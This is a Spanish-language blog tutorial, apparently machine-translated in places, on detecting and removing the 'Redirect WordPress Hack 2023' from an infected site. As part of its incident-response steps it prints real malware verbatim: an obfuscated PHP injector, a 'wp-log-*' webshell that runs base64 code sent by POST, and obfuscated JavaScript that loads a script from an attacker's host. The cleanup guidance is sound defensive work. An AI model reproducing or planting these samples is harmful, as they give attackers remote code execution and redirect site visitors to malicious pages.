Fix Redirect WordPress Hack 2023 (Virus de redirección)

WordPress Definitivamente es la plataforma más utilizada. CMS (Content Management System) tanto para blogs como para tiendas online de inicio (con el módulo WooCommerce), lo que lo convierte en el más blanco de ataques informáticos (piratería). Una de las operaciones de piratería más utilizadas tiene como objetivo redirigir el sitio web comprometido a otras páginas web. Redirect WordPress Hack 2023 es un malware relativamente nuevo que tiene el impacto de redirigir todo el sitio a páginas web de spam o que a su vez puede infectar las computadoras de los usuarios.

Si su sitio se desarrolló en WordPress es redirigido a otro sitio, entonces lo más probable es que sea víctima del ya famoso hack de redirección.

En este tutorial encontrará la información necesaria y consejos útiles para desinfectar un sitio web infectado con una redirección. WordPress Hack (Virus Redirect). A través de los comentarios puedes obtener información adicional o pedir ayuda.

Detección del virus que redirige los sitios WordPress

Una disminución repentina e injustificada del tráfico del sitio web, una disminución del número de pedidos (en el caso de las tiendas online) o de los ingresos publicitarios son las primeras señales de que algo anda mal. Detectando "Redirect WordPress Hack 2023” (Redirección de virus) también se puede hacer “visualmente” cuando abre el sitio web y es redirigido a otra página web.

Por experiencia, la mayoría del malware web es compatible con los navegadores de Internet: Chrome, Firefox, Edge, Opera. Si eres un usuario de la computadora Mac, estos virus no son realmente visibles en el navegador Safari. Sistema de seguridad de Safari bloquear silenciosamente estos scripts maliciosos.

Qué hacer si tienes un sitio web infectado con Redirect WordPress Hack

Espero que el primer paso no sea entrar en pánico o eliminar el sitio web. Incluso los archivos infectados o con virus no deben eliminarse al principio. Contienen información valiosa que puede ayudarlo a comprender dónde está la brecha de seguridad y qué afectó al virus. Modus operandi.

Cerrar el sitio web al público.

¿Cómo se cierra un sitio web de virus a los visitantes? La más sencilla es utilizar el administrador de DNS y eliminar la IP de "A" (el nombre de dominio) o definir una IP inexistente. Por lo tanto, los visitantes del sitio web estarán protegidos de esta redirect WordPress hack lo que puede conducirlos a páginas web de virus o SPAM.

Si utiliza CloudFlare como administrador de DNS, inicia sesión en la cuenta y elimina los registros de DNS "A” para el nombre de dominio. Así, el dominio afectado por el virus quedará sin IP, no pudiendo acceder más desde Internet.

Usted copia la IP del sitio web y la "enruta" para que solo usted pueda acceder a ella. Desde tu computadora.

Cómo cambiar la IP real de un sitio web en computadoras Windows?

El método se usa a menudo para bloquear el acceso a ciertos sitios web editando el archivo "hosts".

1. abres Notepad u otro editor de texto (con derechos administrator) y edite el archivo "hosts". Está localizado en:

C:\Windows\System32\drivers\etc\hosts

2. En el archivo "hosts", agregue "ruta" a la IP real de su sitio web. IP eliminada arriba del administrador de DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Guarde el archivo y acceda al sitio web en el navegador.

Si el sitio web no se abre y no ha hecho nada malo en el archivo "hosts", lo más probable es que sea un caché de DNS.

Para borrar la caché de DNS en un sistema operativo Windows, abierto Command Prompt, donde ejecutas el comando:

ipconfig /flushdns

Cómo cambiar la IP real de un sitio web en computadoras Mac / Mac¿Libro?

Para usuarios de computadoras Mac es algo más sencillo cambiar la IP real de un sitio web.

1. Abra la utilidad Terminal.

2. Ejecute la línea de comando (requiere contraseña del sistema para ejecutar):

sudo nano /etc/hosts

3. Igual que para las computadoras Windows, añade la IP real del dominio.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Guarde los cambios. Ctrl+X (y).

Después de haber "enrutado", usted es la única persona que puede acceder al sitio web infectado con Redirect WordPress Hack.

Copia de seguridad completa del sitio web: archivos y base de datos

Incluso si está infectado con “redirect WordPress hack”, la recomendación es hacer una copia de seguridad general de todo el sitio web. Archivos y base de datos. Posiblemente también podría guardar una copia local de ambos archivos de public / public_html así como la base de datos.

Identificación de archivos infectados y modificados por Redirect WordPress Hack 2023

Los principales archivos de destino de la WordPress hay index.php (en la raíz), header.php, index.php şi footer.php del tema WordPress activos. Verifique manualmente estos archivos e identifique el código malicioso o un script de malware.

En 2023, un virus del “Redirect WordPress Hack” poner en index.php un código de la forma:

(¡No recomiendo ejecutar estos códigos!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Decodificado, esto guión malicioso es básicamente la consecuencia de que el sitio web está infectado WordPress. No es el script detrás del malware, es el script que hace posible redirigir la página web infectada. Si decodificamos el script anterior, obtenemos:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Para identificar todos los archivos en el servidor que contienen este código, es bueno tener acceso SSH al servidor para ejecutar la verificación de archivos y las líneas de comando de administración en Linux.

Relacionado: Cómo saber si tu blog está infectado o no, con ayuda Google Search (WordPress Virus)

A continuación se muestran dos comandos que definitivamente son útiles para identificar archivos modificados recientemente y archivos que contienen un determinado código (cadena).

¿Cómo te ves? Linux ¿Los archivos PHP cambiaron en las últimas 24 horas o en algún otro período de tiempo?

Pedido "find” es muy simple de usar y permite la personalización para establecer el período de tiempo, la ruta de búsqueda y el tipo de archivos.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

En la salida recibirá información sobre la fecha y hora en que se modificó el archivo, los permisos de escritura/lectura/ejecución (chmod) y a qué grupo/usuario pertenece.

Si desea consultar hace más días, cambie el valor "-mtime -1" o usar "-mmin -360” para minutos (6 horas).

¿Cómo buscar un código (cadena) dentro de archivos PHP, Java?

La línea de comando "buscar" que le permite encontrar rápidamente todos los archivos PHP o Java que contienen un código determinado es la siguiente:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

El comando buscará y mostrará los archivos. .php şi .js que contiene "uJjBRODYsU".

Con la ayuda de los dos comandos anteriores, descubrirá muy fácilmente qué archivos se han modificado recientemente y cuáles contienen código malicioso.

Elimina el código malicioso de los archivos modificados sin comprometer el código correcto. En mi escenario, el malware se colocó antes de abrir <head>.

Al ejecutar el primer comando "buscar", es muy posible descubrir nuevos archivos en el servidor, que no son tuyos WordPress ni puesta allí por ti. Archivos pertenecientes al tipo de virus Redirect WordPress Hack.

En el escenario que investigué, archivos de la forma “wp-log-nOXdgD.php". Estos son archivos de "generación" que también contienen código de malware utilizado por el virus para la redirección.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

El propósito de los archivos de tipo "wp-log-*” es propagar el virus de pirateo de redirección a otros sitios web alojados en el servidor. Es un código malicioso del tipo “webshell” compuesto por un sección básica (en el que se definen algunas variables cifradas) y o sección de ejecución a través del cual el atacante intenta cargar y ejecutar un código malicioso en el sistema.

Si hay una variable POST llamado 'bh' y su valor encriptado MD5 es igual a "8f1f964a4b4d8d1ac3f0386693d28d03", entonces el script parece escribir el contenido encriptado base64 de otra variable llamada 'b3' en un archivo temporal y luego intenta incluir este archivo temporal.

Si hay una variable POST o GET llamado 'tick', el script responderá con el valor MD5 de la cadena"885".

Para identificar todos los archivos en el servidor que contienen este código, elija una cadena que sea común y luego ejecute el comando “find” (similar al de arriba). Eliminar todos los archivos que contengan este código de malware.

Falla de seguridad explotada por Redirect WordPress Hack

Lo más probable es que este virus de redirección llegue a través de explotación del usuario de administración WordPress o identificando un complemento vulnerable que permite agregar usuarios con privilegios de administrator.

Para la mayoría de los sitios web creados en la plataforma WordPress es posible edición de archivos de temas o complementosdesde la interfaz de administración (Dashboard). Por lo tanto, una persona malintencionada puede agregar código de malware a los archivos de temas para generar los scripts que se muestran arriba.

Un ejemplo de dicho código de malware es este:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificado en el encabezado del tema WordPress, inmediatamente después de abrir la etiqueta <head>.

Es bastante difícil descifrar este JavaScript, pero es obvio que consulta otra dirección web desde donde lo más probable es que obtenga otros scripts para crear los archivos.wp-log-*” del que hablé arriba.

Encuentra y elimina este código de todos los archivos PHP afectado.

Por lo que pude ver, este código era agregado manualmente por un nuevo usuario con privilegios administrativos.

Entonces, para evitar la adición de malware desde el Dashboard, es mejor deshabilitar la opción de editar WordPress Temas/Complementos desde el Dashboard.

Edite el archivo wp-config.php y agrega las lineas:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Después de hacer este cambio, ningún usuario WordPress ya no podrá editar archivos desde el Tablero.

Comprobar usuarios con rol de Administrator

A continuación se muestra una consulta SQL que puede utilizar para buscar usuarios con el rol de administrator en la plataforma WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Esta consulta devolverá todos los usuarios de la tabla. wp_users quien asignó el papel de administrator. La consulta también se hace para la tabla. wp_usermeta buscar en meta'wp_capabilities', que contiene información sobre los roles de los usuarios.

Otro método es identificarlos a partir de: Dashboard → Users → All Users → Administrator. Sin embargo, existen prácticas mediante las cuales un usuario puede ocultarse en el panel del Tablero. Entonces, la mejor forma de ver a los usuarios”Administrator"En WordPress es el comando SQL anterior.

En mi caso identifiqué en la base de datos al usuario con el nombre "wp-import-user". Bastante sugerente.

También desde aquí se puede ver la fecha y hora del usuario WordPress fue creado. El ID de usuario también es muy importante porque busca en los registros del servidor. De esta manera puedes ver toda la actividad de este usuario.

Eliminar usuarios con rol de administrator que no sabes, entonces cambiar contraseñas a todos los usuarios administrativos. editor, autor, Administrator.

Cambiar la contraseña del usuario de la base de datos SQL del sitio web afectado.

Después de seguir estos pasos, el sitio web se puede reiniciar para todos los usuarios.

Tenga en cuenta, sin embargo, que lo que presenté anteriormente es uno de quizás miles de escenarios en los que un sitio web está infectado con Redirect WordPress Hack en 2023.

Si tu web se ha infectado y necesitas ayuda o tienes alguna duda, la sección de comentarios está abierta.